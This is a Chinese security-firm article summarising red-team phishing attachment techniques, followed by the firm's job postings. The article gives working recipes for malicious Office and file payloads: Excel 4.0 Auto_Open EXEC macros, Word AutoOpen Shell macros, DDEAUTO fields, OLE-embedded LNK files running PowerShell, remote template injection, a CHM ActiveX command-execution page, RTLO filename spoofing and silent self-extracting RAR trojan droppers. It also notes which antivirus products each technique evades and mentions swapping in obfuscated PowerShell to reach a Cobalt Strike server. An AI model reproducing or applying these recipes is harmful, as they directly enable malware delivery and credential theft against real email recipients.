行业新闻

钓鱼常用手法总结

钓鱼常用手法总结







STATEMENT

声明


由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测及文章作者不为此承担任何责任。

雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。







前言


钓鱼邮件想必大家都听说过,而我们经常会认为自己足够聪明不会上当。但请不要轻视钓鱼邮件的伪装,全球每年因为钓鱼邮件造成的经济损失高达数百亿。钓鱼邮件会伪装成任何一封看似普通不过的邮件用来欺骗收件人将账号、口令或密码等信息,甚至连超链接中的网页也做得很逼真,当你信以为真的时候,你在网页中留下的重要信息就是别人的囊中之物了。

这里介绍红队中最长用的钓鱼方式:


链接钓鱼

邮件中携带超级链接或网址,这类钓鱼邮件其实也很常见,骗子在邮件内直接嵌入了钓鱼链接,点开链接是骗子做的以假乱真的钓鱼网站,这类网站通常会要求用户输入账户信息之类以获取用户敏感信息。

附件钓鱼

邮件中携带各类附件,很多人看到邮件中有附件时,就习惯性的点开查看。附件钓鱼邮件以exe/scr后缀的附件的风险程度最高,一般是病毒执行程序。其他常见的还有Html网页附件、Doc附件、Excel附件、PDF附件等。


接下来针对附件钓鱼中的各类文件制作手法进行介绍,以及杀软查杀情况。(部分手法和图片是收集网上资料整合的,并结合自身经验写了这一篇较全面的总结。)





XLM / Macro 4.0 (excel宏钓鱼)

新建sheet表,选择插入MS Excel4.0宏表

输入命令设置第一行Auto_Open

=EXEC("c:\windows\system32\cmd.exe")

=HALT()

保存后打开文件即运行程序

可利用宏使用powershell命令上线cs

powershell上线cs,混淆命令执行

杀软

火绒

360全家桶

Defender

混淆命令

无提示

行为查杀

宏文件提示





Word宏钓鱼

新建word文件,设置宏

输AutoOpen(文件打开时自动执行宏),宏的位置要指定为当前文档

AutoExec:启动 Word 或加载全局模板时

AutoNew:每次新建文档时

AutoOpen:每次打开已有文档时

AutoClose:每次关闭文档时

AutoExit:退出 Word 或卸载全局模板时


Sub AutoOpen()Shell ("calc") //只需要写这个就行了End Sub

保存为docm(启用宏的word文档)

一般情况下,开启文件需要手动开启宏

杀软

火绒

360全家桶

Defender

免杀木马

无提示

无提示

无提示





Word DDE

Microsoft Office Word 的一个执行任意代码的方法,可以在不启用宏的情况下执行任意程序。

这个功能的本意是为了更方便地在 word 里同步更新其它应用的内容,比如说在一个 word 文档里引用了另一个 excel 表格里的某项内容,通过连接域 (Field) 的方式可以实现在 excel 里更新内容后 word 中同步更新的效果,问题出在这个域的内容可以是一个公式 (或者说表达式),这个公式并不限制内容。

实用性相较于宏来说更为实用。DDE执行时用户点击两个按钮即可执行。

新建Word文档,CTRL+F9,在文档中出现"{}"之后将代码复制大括号之间,保存文件:


{ DDEAUTO c:\windows\system32\cmd.exe "/k calc.exe" }

杀软

火绒

360全家桶

Defender

免杀木马

无提示

无提示

无提示





office OLE+LNK

创建link文件诱导用户点击,Word和Excel都可以使用。

创建快捷方式

目标位置填写命令操作


%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc

在Word或Excel中插入对象,选择package,为了提高诱导性点击勾选显示为图标,更改图标为word或者excel等迷惑性更大的图标。

修改相应标题名等,插入link。用户点击即可运行程序操作。

powershell上线cs,混淆命令执行

杀软

火绒

360全家桶

Defender

混淆命令

无提示

行为查杀,不能携带-w hidden

无提示





模板文件注入宏指令

创建带模板的文档,再创建一个启用宏的模板文件。然后在带模板的文档的压缩包里面修改内容,使其指向的模板修改为我们自己创建的模板文件,这之间的过程可以由smb协议完成,故过查杀几率较高。

在启用宏的模板文件(doc3.dotm)里写入宏。


Sub AutoOpen()Shell "calc" //此处填写命令End Sub

在启用模板的文档doc3.docx压缩包中找到word_rels\settings.xml.rels修改Target,将file协议指向模板文件

打开文档即可执行命令

Target项协议可以使用smb和http,极大的增加了钓鱼场景

powershell上线cs,混淆命令执行、

杀软

火绒

360全家桶

Defender

混淆命令

无提示

宏病毒行为查杀,未携带-w hidden

宏病毒





CHM 电子书

新建html文件,编码格式ANSI,写入代码


<html><head><title>Mousejack replaytitle><head>head><body>command exec<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1><PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',cmd.exe,/c calc.exe'>//这一排用于执行命令,注意cmd.exe前后都有,或者<PARAM name="Item1" value=',powershell.exe,-c calc.exe'>也行<PARAM name="Item2" value="273,1,1">OBJECT><SCRIPT>x.Click();SCRIPT>body>html>

使用easychm软件,新建-浏览-选择html文件所在目录-选择html文件-编译

相对于宏文档,chm电子书的场景较为局限,附件中携带chm电子书需要配合设备、xx手册等钓鱼话术

powershell上线cs,混淆命令执行

杀软

火绒

360全家桶

Defender

混淆命令

无提示

黑窗无提示

无提示





RTLO字符

制作木马文件,输入后缀的倒序

技巧:[文件名][伪造后缀倒序].exe

重命名,在a后面右键,插入Unicode控制字符->RLO

钓鱼时可命名为:XXX公司xxxx文档 编号IT111ubcehdx

增加混淆程度

使用免杀加载器生成木马测试

杀软

火绒

360全家桶

Defender

混淆命令

无提示

无提示

无提示





rar解压自运行

木马文件:artifact.exe 迷惑文件:calc.exe或者文档

进入winrar,选中这两个文件,右键添加至压缩包,创建自解压格式压缩文件

高级->自解压选项->设置

模式->全部隐藏

更新->解压并更新文件,覆盖所有文件

运行后上线

杀软

火绒

360全家桶

Defender

免杀木马

查杀

查杀

查杀







RECRUITMENT

招聘启事


安恒雷神众测SRC运营(实习生)

————————

【职责描述】

1. 负责SRC的微博、微信公众号等线上新媒体的运营工作,保持用户活跃度,提高站点访问量;

2. 负责白帽子提交漏洞的漏洞审核、Rank评级、漏洞修复处理等相关沟通工作,促进审核人员与白帽子之间友好协作沟通;

3. 参与策划、组织和落实针对白帽子的线下活动,如沙龙、发布会、技术交流论坛等;

4. 积极参与雷神众测的品牌推广工作,协助技术人员输出优质的技术文章;

5. 积极参与公司媒体、行业内相关媒体及其他市场资源的工作沟通工作。


【任职要求】 

 1. 责任心强,性格活泼,具备良好的人际交往能力;

 2. 对网络安全感兴趣,对行业有基本了解;

 3. 良好的文案写作能力和活动组织协调能力。


简历投递至 

bountyteam@dbappsecurity.com.cn

设计师(实习生)

————————

【职位描述】

负责设计公司日常宣传图片、软文等与设计相关工作,负责产品品牌设计。


【职位要求】

1、从事平面设计相关工作1年以上,熟悉印刷工艺;具有敏锐的观察力及审美能力,及优异的创意设计能力;有 VI 设计、广告设计、画册设计等专长;

2、有良好的美术功底,审美能力和创意,色彩感强;

3、精通photoshop/illustrator/coreldrew/等设计制作软件;

4、有品牌传播、产品设计或新媒体视觉工作经历;


【关于岗位的其他信息】

企业名称:杭州安恒信息技术股份有限公司

办公地点:杭州市滨江区安恒大厦19楼

学历要求:本科及以上

工作年限:1年及以上,条件优秀者可放宽


简历投递至 

bountyteam@dbappsecurity.com.cn

安全招聘

————————


公司:安恒信息

岗位:Web安全 安全研究员

部门:战略支援部

薪资:13-30K

工作年限:1年+

工作地点:杭州(总部)、广州、成都、上海、北京

工作环境:一座大厦,健身场所,医师,帅哥,美女,高级食堂…


【岗位职责】

1.定期面向部门、全公司技术分享;

2.前沿攻防技术研究、跟踪国内外安全领域的安全动态、漏洞披露并落地沉淀;

3.负责完成部门渗透测试、红蓝对抗业务;

4.负责自动化平台建设

5.负责针对常见WAF产品规则进行测试并落地bypass方案


【岗位要求】

1.至少1年安全领域工作经验;

2.熟悉HTTP协议相关技术

3.拥有大型产品、CMS、厂商漏洞挖掘案例;

4.熟练掌握php、java、asp.net代码审计基础(一种或多种)

5.精通Web Fuzz模糊测试漏洞挖掘技术

6.精通OWASP TOP 10安全漏洞原理并熟悉漏洞利用方法

7.有过独立分析漏洞的经验,熟悉各种Web调试技巧

8.熟悉常见编程语言中的至少一种(Asp.net、Python、php、java)


【加分项】

1.具备良好的英语文档阅读能力;

2.曾参加过技术沙龙担任嘉宾进行技术分享;

3.具有CISSP、CISA、CSSLP、ISO27001、ITIL、PMP、COBIT、Security+、CISP、OSCP等安全相关资质者;

4.具有大型SRC漏洞提交经验、获得年度表彰、大型CTF夺得名次者;

5.开发过安全相关的开源项目;

6.具备良好的人际沟通、协调能力、分析和解决问题的能力者优先;

7.个人技术博客;

8.在优质社区投稿过文章;


岗位:安全红队武器自动化工程师

薪资:13-30K

工作年限:2年+

工作地点:杭州(总部)


【岗位职责】

1.负责红蓝对抗中的武器化落地与研究;

2.平台化建设;

3.安全研究落地。


【岗位要求】

1.熟练使用Python、java、c/c++等至少一门语言作为主要开发语言;

2.熟练使用Django、flask 等常用web开发框架、以及熟练使用mysql、mongoDB、redis等数据存储方案;

3:熟悉域安全以及内网横向渗透、常见web等漏洞原理;

4.对安全技术有浓厚的兴趣及热情,有主观研究和学习的动力;

5.具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。


【加分项】

1.有高并发tcp服务、分布式等相关经验者优先;

2.在github上有开源安全产品优先;

3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;

4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;

5.具备良好的英语文档阅读能力。


简历投递至

bountyteam@dbappsecurity.com.cn

岗位:红队武器化Golang开发工程师

薪资:13-30K

工作年限:2年+

工作地点:杭州(总部)


【岗位职责】

1.负责红蓝对抗中的武器化落地与研究;

2.平台化建设;

3.安全研究落地。


【岗位要求】

1.掌握C/C++/Java/Go/Python/JavaScript等至少一门语言作为主要开发语言;

2.熟练使用Gin、Beego、Echo等常用web开发框架、熟悉MySQL、Redis、MongoDB等主流数据库结构的设计,有独立部署调优经验;

3.了解docker,能进行简单的项目部署;

3.熟悉常见web漏洞原理,并能写出对应的利用工具;

4.熟悉TCP/IP协议的基本运作原理;

5.对安全技术与开发技术有浓厚的兴趣及热情,有主观研究和学习的动力,具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。


【加分项】

1.有高并发tcp服务、分布式、消息队列等相关经验者优先;

2.在github上有开源安全产品优先;

3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;

4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;

5.具备良好的英语文档阅读能力。


简历投递至

bountyteam@dbappsecurity.com.cn

岗位:红队武器化Golang开发工程师

薪资:13-30K

工作年限:2年+

工作地点:杭州(总部)


【岗位职责】

1.负责红蓝对抗中的武器化落地与研究;

2.平台化建设;

3.安全研究落地。


【岗位要求】

1.掌握C/C++/Java/Go/Python/JavaScript等至少一门语言作为主要开发语言;

2.熟练使用Gin、Beego、Echo等常用web开发框架、熟悉MySQL、Redis、MongoDB等主流数据库结构的设计,有独立部署调优经验;

3.了解docker,能进行简单的项目部署;

3.熟悉常见web漏洞原理,并能写出对应的利用工具;

4.熟悉TCP/IP协议的基本运作原理;

5.对安全技术与开发技术有浓厚的兴趣及热情,有主观研究和学习的动力,具备正向价值观、良好的团队协作能力和较强的问题解决能力,善于沟通、乐于分享。


【加分项】

1.有高并发tcp服务、分布式、消息队列等相关经验者优先;

2.在github上有开源安全产品优先;

3:有过安全开发经验、独自分析过相关开源安全工具、以及参与开发过相关后渗透框架等优先;

4.在freebuf、安全客、先知等安全平台分享过相关技术文章优先;

5.具备良好的英语文档阅读能力。


简历投递至

bountyteam@dbappsecurity.com.cn



END

长按识别二维码关注我们

关闭